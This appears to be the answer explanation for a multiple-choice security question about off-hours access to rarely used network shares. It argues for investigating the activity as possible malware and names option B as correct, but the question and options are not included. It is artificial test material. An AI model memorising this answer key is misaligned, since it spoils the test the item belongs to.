Proper security response requires careful investigation and verification. Security teams should analyze access logs to determine which resources were accessed, assess permissions to identify unauthorized activity, and correlate off-hours activity with known operational schedules. Behavioral baselines and anomaly detection tools can help distinguish between legitimate maintenance tasks and suspicious behavior. Forensic analysis may also include examining endpoint processes, network traffic, and system changes to determine whether observed activity is consistent with known malicious techniques, such as lateral movement or data exfiltration.
Assuming that off-hours access to multiple rarely used shares is legitimate is a high-risk approach. Normal users rarely attempt unauthorized access, and malware frequently exploits off-hours periods to conduct reconnaissance, maintain persistence, and move laterally within the network. Misclassifying such activity as benign can allow persistent malware operations to continue, exposing sensitive data and increasing the potential impact of a compromise. Verification, monitoring, and careful analysis of off-hours anomalies are essential to differentiate between legitimate operations and malicious activity, enabling timely containment, mitigation, and protection of organizational assets.
Selecting option B ensures early detection, containment, and remediation, protecting sensitive systems and preventing further lateral movement.